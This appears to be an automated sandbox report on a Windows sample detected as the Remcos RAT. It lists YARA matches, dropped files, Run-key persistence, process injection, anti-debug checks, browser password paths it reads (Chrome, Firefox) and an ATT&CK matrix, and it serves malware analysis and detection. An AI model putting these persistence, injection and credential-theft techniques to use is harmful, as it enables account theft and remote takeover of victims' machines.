              Source: C:\Users\Public\vtgpyX.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
              Source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/9@96/5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040E39F GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,2_2_0040E39F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00409973 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,2_2_00409973
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004097FD FindResourceA,LoadResource,LockResource,SizeofResource,2_2_004097FD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041031F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUUJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6200:120:WilError_01
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
              Source: C:\Users\user\Desktop\V8IB839cvz.exeMutant created: \Sessions\1\BaseNamedObjects\daxvxdsaxzcas-LAPFBZ
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Software\2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: ProductName2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Remcos2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: licence2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: Administrator2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: User2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCommand line argument: [Info]2_2_0040928D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: V8IB839cvz.exeReversingLabs: Detection: 41%
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile read: C:\Users\user\Desktop\V8IB839cvz.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\V8IB839cvz.exe 'C:\Users\user\Desktop\V8IB839cvz.exe'
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exe
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' '
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
              Source: unknownProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe 'C:\Users\Public\Xypgtv\Xypgtv.exe'
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exe
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exeJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' 'Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exeJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exeJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Data Obfuscation:

              barindex
              Detected unpacking (overwrites its own PE header)Show sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeUnpacked PE file: 2.2.V8IB839cvz.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 15.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeUnpacked PE file: 17.2.Xypgtv.exe.400000.0.unpack
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_004096D6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret 0_3_022182B8
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret 0_3_022182B8
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax0_3_02219BAD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax0_3_02219BAD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret 0_3_02217FC5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret 0_3_02217FC5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret 0_3_02218778
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret 0_3_02218778
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret 0_3_0221545C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret 0_3_0221545C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218442 push 00406044h; ret 0_3_02218468
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218442 push 00406044h; ret 0_3_02218468
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218444 push 00406044h; ret 0_3_02218468
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218444 push 00406044h; ret 0_3_02218468
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825A push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_0221825C push 00405E5Ch; ret 0_3_02218280
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret 0_3_022182B8
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218294 push 00405E94h; ret 0_3_022182B8
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax0_3_02219BAD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02219BAC push ecx; mov dword ptr [esp], eax0_3_02219BAD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret 0_3_02217FC5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02217F7C push 00405BA1h; ret 0_3_02217FC5
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret 0_3_02218778
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02218754 push 00406354h; ret 0_3_02218778
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 0_3_02215420 push eax; ret 0_3_0221545C
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00403E7D ShellExecuteW,URLDownloadToFileW,2_2_00403E7D
              Source: C:\Users\user\Desktop\V8IB839cvz.exeFile created: C:\Users\Public\Xypgtv\Xypgtv.exeJump to dropped file
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041031F OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_0041031F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XypgtvJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run XypgtvJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_004096D6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00409834 Sleep,ExitProcess,2_2_00409834
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_0041004D
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004041E6 FindFirstFileW,FindNextFileW,2_2_004041E6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043C2E9 FindFirstFileExA,2_2_0043C2E9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406317 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00406317
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0041146E FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,2_2_0041146E
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004074C9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_004074C9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004076E4 FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_004076E4
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00406776 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00406776
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004049A0 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,2_2_004049A0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0042911F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004096D6 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_004096D6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00434340 mov eax, dword ptr fs:[00000030h]2_2_00434340
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0043D5BD GetProcessHeap,2_2_0043D5BD
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0042911F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0042911F
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004292B1 SetUnhandledExceptionFilter,2_2_004292B1
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_004294DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004294DC
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00430AB0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00430AB0

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeMemory written: C:\Users\user\Desktop\V8IB839cvz.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeMemory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeMemory written: C:\Users\Public\Xypgtv\Xypgtv.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_0040F733 StrToIntA,mouse_event,2_2_0040F733
              Source: C:\Users\user\Desktop\V8IB839cvz.exeProcess created: C:\Users\user\Desktop\V8IB839cvz.exe C:\Users\user\Desktop\V8IB839cvz.exeJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exeJump to behavior
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeProcess created: C:\Users\Public\Xypgtv\Xypgtv.exe C:\Users\Public\Xypgtv\Xypgtv.exeJump to behavior
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: V8IB839cvz.exe, 00000002.00000002.912525207.0000000000DB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00410E32 cpuid 2_2_00410E32
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00440080
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,2_2_004380A8
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_0043F748
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoA,2_2_00409947
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,2_2_0043F9C0
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,2_2_0043FA0B
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,2_2_0043FAA6
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_0043FB33
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: EnumSystemLocalesW,2_2_00437C22
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,2_2_0043FD83
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0043FEAC
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: GetLocaleInfoW,2_2_0043FFB3
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00438112 GetSystemTimeAsFileTime,2_2_00438112
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: 2_2_00410C6E CreateThread,GetComputerNameExW,GetUserNameW,2_2_00410C6E
              Source: C:\Users\Public\Xypgtv\Xypgtv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Contains functionality to steal Chrome passwords or cookiesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_004073AB
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_004074C9
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: \key3.db2_2_004074C9

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688515879.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.688799265.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000000.689160997.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6324, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Xypgtv.exe PID: 6480, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: V8IB839cvz.exe PID: 6584, type: MEMORY
              Source: Yara matchFile source: 2.2.V8IB839cvz.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.Xypgtv.exe.400000.0.unpack, type: UNPACKEDPE
              Source: C:\Users\user\Desktop\V8IB839cvz.exeCode function: cmd.exe2_2_004037DD

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
              Default AccountsNative API1Windows Service1Access Token Manipulation1Scripting1Credentials In Files2Account Discovery1Remote Desktop ProtocolClipboard Data2Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter12Registry Run Keys / Startup Folder1Windows Service1Obfuscated Files or Information2Security Account ManagerSystem Service Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Logon Script (Mac)Process Injection112Software Packing1NTDSFile and Directory Discovery2Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder1Masquerading1LSA SecretsSystem Information Discovery33SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol12Manipulate Device CommunicationManipulate App Store Rankings or Ratings
